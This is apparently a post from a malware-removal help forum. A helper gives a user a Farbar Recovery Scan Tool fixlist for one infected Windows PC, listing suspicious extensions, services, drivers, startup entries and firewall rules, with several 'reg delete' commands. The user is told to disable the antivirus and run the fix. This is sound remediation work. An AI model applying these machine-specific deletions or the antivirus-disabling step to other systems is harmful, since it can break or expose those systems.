FF Extension: (supermegabest) - C:\Users\Огурцов\AppData\Roaming\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\[email protected] [2016-03-23] [Legacy]
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\autoconfig.js [2018-11-08] <==== ATTENTION (Points to *.cfg file)
FF ExtraCheck: C:\Program Files\mozilla firefox\cck2.cfg [2018-11-08] <==== ATTENTION
CHR Profile: C:\Users\Огурцов\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2016-12-04] <==== ATTENTION
CHR Extension: (No Name) - C:\Users\Огурцов\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ahggfmgiidlaceichjfemgbaggnbaloe [2017-11-02]
CHR Extension: (Adblocker for Youtube™) - C:\Users\Огурцов\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\cpmgdbdchhjimcbfbbhlbchbobhjonna [2016-12-22]
CHR Profile: C:\Users\Огурцов\AppData\Local\Google\Chrome\User Data\System Profile [2017-01-27]
CHR Extension: (No Name) - C:\Users\Огурцов\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\ahggfmgiidlaceichjfemgbaggnbaloe [2017-11-02]
CHR Extension: (Adblocker for Youtube™) - C:\Users\Огурцов\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\cpmgdbdchhjimcbfbbhlbchbobhjonna [2016-12-22]
CHR HKU\S-1-5-21-2316502943-295965077-1323287568-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ahkmpjnmnhjkpkacdhkliipnncobgkhk] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-2316502943-295965077-1323287568-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo] - hxxp://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-2316502943-295965077-1323287568-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [gndelhfhcfbdhndfpcinebijfcjpmpec] - hxxp://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-2316502943-295965077-1323287568-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-2316502943-295965077-1323287568-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [oelpkepjlgmehajehfeicfbjdiobdkfj] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-2316502943-295965077-1323287568-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [phokcamelcbnjikjgomjjadeihhbbidh] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ablpcikjmhamjanpibkccdmpoekjigja] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [aonedlchkbicmhepimiahfalheedjgbh] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [bhjhnafpiilpffhglajcaepjbnbjemci] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ccfifbojenkenpkmnbnndeadpfdiffof] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [clgckgfbhciacomhlchmgdnplmdiadbj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [hcadgijmedbfgciegjomfpjcdchlhnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ilhapdfjlmhfdgdbefpinebijmhjijpn] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [indjgiebmakhmnaplnlnanodkfiejfjd] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lhemechcanjmilllmccjbjldonmnnjjj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [oelpkepjlgmehajehfeicfbjdiobdkfj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ojlcebdkbpjdpiligkdbbkdkfjmchbfd] - hxxps://clients2.google.com/service/update2/crx
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Setmy\Application\chrome.exe <==== ATTENTION
S2 Anubophatuvot; C:\Program Files (x86)\Secockarercient\JahashargkCch.dll [X]
S2 Archer; C:\Program Files (x86)\WinArcher\Archer.dll [X] <==== ATTENTION
S2 Cercither; C:\Program Files (x86)\Natertionkacerse\PptPrv.dll [X]
S2 HPWombat Service; C:\Program Files (x86)\HPWombat\HPWombatSrv.exe [X] <==== ATTENTION
S2 InstallerService; C:\Program Files\TrueKey\Mcafee.TrueKey.InstallerService.exe -originalversion 4.4.127.0 [X]
S2 TrueKey; "C:\Program Files\TrueKey\McAfee.TrueKey.Service.exe" [X]
S2 zutuzuni; C:\Program Files (x86)\87684081-1451210377-11CB-A5D0-F6E7D98D013F\jnsc7866.tmp [X] <==== ATTENTION
S1 kdvscdat; \??\C:\WINDOWS\system32\drivers\kdvscdat.sys [X]
S1 kkpqecnb; \??\C:\WINDOWS\system32\drivers\kkpqecnb.sys [X]
S1 zmyotbtz; \??\C:\WINDOWS\system32\drivers\zmyotbtz.sys [X]
2019-01-25 16:39 - 2019-01-25 16:39 - 000000062 ____C C:\Users\Огурцов\AppData\Roaming\at.txt
2019-01-19 16:05 - 2019-01-19 16:05 - 000000000 ___DC C:\ProgramData\ByteFence
2019-01-19 15:53 - 2019-01-19 15:53 - 000001046 ____C C:\Users\Огурцов\Desktop\ByteFence Anti-Malware.lnk
2019-01-19 15:53 - 2019-01-19 15:53 - 000000000 ___DC C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ByteFence Anti-Malware
2019-01-19 15:51 - 2019-01-19 15:51 - 000000000 ___DC C:\Users\Огурцов\AppData\Roaming\efixmypc.com
2019-01-19 15:50 - 2019-01-25 17:47 - 000000000 ___DC C:\Program Files\Advance PC-Care
Virustotal: C:\Users\Огурцов\Downloads\opengl.exe
Virustotal: C:\Users\Огурцов\Downloads\OneShot Русификатор.exe
2019-01-19 15:50 - 2019-01-19 15:50 - 000221302 ____C C:\Users\Огурцов\AppData\Roaming\DMGR_1N1I1F1S1T1I0M1F1Q2Y1I1P1B0C1F1Q1P.txt
2019-01-19 15:50 - 2019-01-19 15:50 - 000000860 ____C C:\Users\Public\Desktop\Advance PC-Care.lnk
2019-01-19 15:50 - 2019-01-19 15:50 - 000000000 ___DC C:\Users\Все пользователи\efixmypc.com
2019-01-19 15:50 - 2019-01-19 15:50 - 000000000 ___DC C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Advance PC-Care
2019-01-19 15:50 - 2019-01-19 15:50 - 000000000 ___DC C:\ProgramData\efixmypc.com
2019-01-25 17:24 - 2018-12-27 17:23 - 000000000 _SHDC C:\ProgramData\mineonepapkavostonaj
2018-01-10 18:16 - 2018-01-10 18:16 - 000000288 ___HC () C:\Users\Огурцов\AppData\Roaming\3b01b117ec3368f4c02bec10fe19f5bfb929dd2b
2016-10-25 15:37 - 2016-10-25 15:37 - 007214592 ____C () C:\Users\Огурцов\AppData\Roaming\agent.dat
2016-10-25 15:37 - 2016-10-25 15:29 - 000710656 ____C () C:\Users\Огурцов\AppData\Roaming\Ansoft.exe
2016-10-25 15:37 - 2016-10-25 15:37 - 001910964 ____C () C:\Users\Огурцов\AppData\Roaming\Ansoft.tst
2019-01-19 15:50 - 2019-01-19 15:50 - 000221302 ____C () C:\Users\Огурцов\AppData\Roaming\DMGR_1N1I1F1S1T1I0M1F1Q2Y1I1P1B0C1F1Q1P.txt
2018-01-10 05:59 - 2018-01-10 05:59 - 000000128 ___HC () C:\Users\Огурцов\AppData\Roaming\ecf00c38dc807e105d881c433a6b455dd2c606b6
2015-12-27 13:03 - 2015-12-27 13:03 - 000005120 ____C () C:\Users\Огурцов\AppData\Roaming\GiftBag.db
2016-10-23 15:52 - 2016-10-25 15:34 - 000016368 ____C () C:\Users\Огурцов\AppData\Roaming\InstallationConfiguration.xml
2016-10-23 15:52 - 2016-10-25 15:29 - 000140288 ____C () C:\Users\Огурцов\AppData\Roaming\Installer.dat
2016-10-25 15:37 - 2016-10-25 15:37 - 000018432 ____C () C:\Users\Огурцов\AppData\Roaming\Main.dat
2016-10-25 15:37 - 2016-10-25 15:37 - 000005568 ____C () C:\Users\Огурцов\AppData\Roaming\md.xml
2016-10-25 15:37 - 2016-10-25 15:37 - 000126464 ____C () C:\Users\Огурцов\AppData\Roaming\noah.dat
2016-10-25 15:38 - 2016-10-25 15:38 - 000032038 ____C () C:\Users\Огурцов\AppData\Roaming\uninstall_temp.ico
2016-10-25 15:34 - 2016-10-25 15:34 - 000190394 ____C () C:\Users\Огурцов\AppData\Roaming\Vaiadax.bin
C:\Users\Огурцов\AppData\Local\Mail.Ru\MailRuUpdater.exe
C:\Users\Огурцов\AppData\Local\Mail.Ru
C:\program files (x86)\common files\tencent
Reg: reg delete "HKU\S-1-5-21-2316502943-295965077-1323287568-1001\Software\Microsoft\Windows\CurrentVersion\Uninstall\MailRuUpdater" /f
CMD: reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}}" /f /reg:32
Reg: reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\UBar" /f
CMD: reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Youtube AdBlock}" /f /reg:32
CMD: reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}}" /f /reg:32
CMD: reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ZaxarGameBrowser4_is1}" /f /reg:32
CMD: reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ZaxarGameBrowser5_is1)" /f /reg:32
ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ContextMenuHandlers1_S-1-5-21-2316502943-295965077-1323287568-1001: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ContextMenuHandlers4_S-1-5-21-2316502943-295965077-1323287568-1001: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ContextMenuHandlers5_S-1-5-21-2316502943-295965077-1323287568-1001: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
Task: {0D8A891D-890C-4808-84D8-2F436AB14653} - \Microsoft\Windows\Application Experience\AitAgent -> No File <==== ATTENTION
Task: {1274336E-AB06-46B6-A48C-0671C5557CC6} - \Microsoft\Windows\TaskScheduler\Maintenance Configurator -> No File <==== ATTENTION
Task: {1687544D-7247-4F5A-965A-A6E920E55278} - \Microsoft\Windows\TaskScheduler\Manual Maintenance -> No File <==== ATTENTION
Task: {40525C58-79C2-47A1-9AA2-F1D7FC4F0691} - \Microsoft\Windows\WindowsBackup\ConfigNotification -> No File <==== ATTENTION
Task: {41699307-0CBD-47C4-B41E-61216AD1EE7D} - System32\Tasks\DriverPack Cloud => C:\Program Files (x86)\DriverPack Cloud\cloud.exe
Task: {6F02587F-8A2B-4552-97F6-DEEF229E335B} - \Microsoft\Windows\TaskScheduler\Idle Maintenance -> No File <==== ATTENTION
Task: {B7992938-01F1-4F40-A0EC-0D23D2F0F152} - \Microsoft\Windows\TaskScheduler\Regular Maintenance -> No File <==== ATTENTION
Task: {CFD7C21A-808B-487B-A6EC-8A10E44E8360} - \Microsoft\Windows\SettingSync\BackupTask -> No File <==== ATTENTION
Task: {DA093982-3E58-440C-AC74-B5DD36D60170} - System32\Tasks\MailRuUpdater => C:\Users\Огурцов\AppData\Local\Mail.Ru\MailRuUpdater.exe [2017-11-24] (Mail.Ru) <==== ATTENTION
Task: {E431B18E-FF30-412E-956A-F9E0DB99445C} - System32\Tasks\CrashRptz => C:\Users\Огурцов\AppData\Local\CrashRpt\CrashRptz.exe
WMI:subscription\__FilterToConsumerBinding->LogFileEventConsumer.Name=\"DeviceChangeConsumer\"",Filter="__EventFilter.Name=\"DeviceChangeFilter\"::
WMI:subscription\__EventFilter->DeviceChangeFilter::[Query => select * from __instanceOperationEvent within 10 where targetInstance isa 'win32_PnPEntity']
WMI:subscription\LogFileEventConsumer->DeviceChangeConsumer::
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\QQPCRTP => ""="service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\QQPCRTP => ""="service"
HKLM\...\StartupApproved\StartupFolder: => "Zaxar Games Browser.lnk"
HKLM\...\StartupApproved\StartupFolder: => "McAfee Security Scan Plus.lnk"
HKLM\...\StartupApproved\Run: => "WindowsDefender"
HKLM\...\StartupApproved\Run32: => "DiskPower"
HKLM\...\StartupApproved\Run32: => "IconRunner"
HKLM\...\StartupApproved\Run32: => "PWRISOVM.EXE"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\StartupFolder: => "ProfitTaskMonitor.lnk"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "amigo"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "1D8NLRRVNF"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "1IHC5CK5HN"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "3UY4CSROFQ"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "hdtask"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "MailRuUpdater"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "299GTXK38W"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "LTCCY5NFU4"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "RI7FIMYQGU"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "CIUOLCHQV6"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "52THSX3HBL"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "U3VZY4RS3N"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "7S0YZZDLPN"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "ADUE8JHHLJ"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "V527APOCWN"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "E6H6A1LMPM"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "FPEFT4XU1J"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "95RTWV2W37"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "9IO1NQKL9A"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "5YGZRUKDMF"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "17Z9ZGZLNZ"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "mailruhomesearch"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "K8J77YTFGJ"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "6GMTU8RLCT"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "RMIW4E6JXC"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "ycAutoLaunch_1C57F4F4FD8066828BC5E4D43E9AF813"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "Orbitum Update"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "CurrencyConvertor"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "aebleyzkpy"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "LumProcess"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "GoogleChromeAutoLaunch_918ABA8B1445D313589FE9A369122F26"
FirewallRules: [{D4A13780-20C2-4677-A94E-DC0390ECA138}] => (Allow) C:\Users\Огурцов\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe No File
FirewallRules: [{BEE75AB0-0CA6-42F8-A2F2-FA7A850F3068}] => (Allow) C:\program files (x86)\common files\tencent\qqdownload\130\tencentdl.exe (Tencent)
FirewallRules: [{89046AB3-85C2-4A93-902E-3A04E8816CD4}] => (Allow) C:\program files (x86)\common files\tencent\qqdownload\130\bugreport_xf.exe ()
FirewallRules: [{3A71A011-3C8C-4223-83B3-F74CA82E473F}] => (Allow) C:\Program Files\UBar\ubar.exe No File
FirewallRules: [{7173787B-DE1F-489E-9E94-23F93F139957}] => (Allow) C:\Program Files (x86)\Setmy\Application\chrome.exe No File
FirewallRules: [{D8E881C5-2077-4392-94A6-D566049C04AB}] => (Allow) C:\Program Files (x86)\Opera\opera.exe No File
FirewallRules: [{AFA9F0FE-AC37-4B04-8BF4-AC43018C5F7A}] => (Allow) C:\Program Files (x86)\Opera\opera.exe No File
FirewallRules: [{84310AF7-A8CF-4D83-8AE9-1E1C1D2AA2A4}] => (Block) %ProgramFiles% (x86)\Bandicam\bdcam.exe No File
FirewallRules: [{D5F2A808-CA1B-4949-8377-CD9690005013}] => (Allow) C:\Users\Огурцов\AppData\Local\Amigo\Application\amigo.exe No File
FirewallRules: [{45D538B8-C1A2-4846-B333-E0F53B95CB78}] => (Allow) C:\Users\Огурцов\AppData\Local\yc\Application\yc.exe No File
Reboot:[/CODE]
and save it as fixlist.txt in the folder with Farbar Recovery Scan Tool. [U]When saving, choose the [B]Unicode[/B] encoding![/U]
Disable your antivirus until the reboot, [U]close all browsers[/U], run FRST.EXE/FRST64.EXE, click [B]Fix[/B] once and wait. The program will create a log file ([B]Fixlog.txt[/B]). Attach it to your next post.
The computer will be rebooted automatically.
Make a [URL="https://virusinfo.info/showthread.php?t=218752&p=1480546&viewfull=1#post1480546"]Malwarebytes AdwCleaner[/URL] log.
Statistics of the treatment performed:
[LIST][*]Quarantines received: [B]2[/B][*]Files processed: [B]7[/B][*]No malicious programs were found in the quarantines during treatment[/LIST]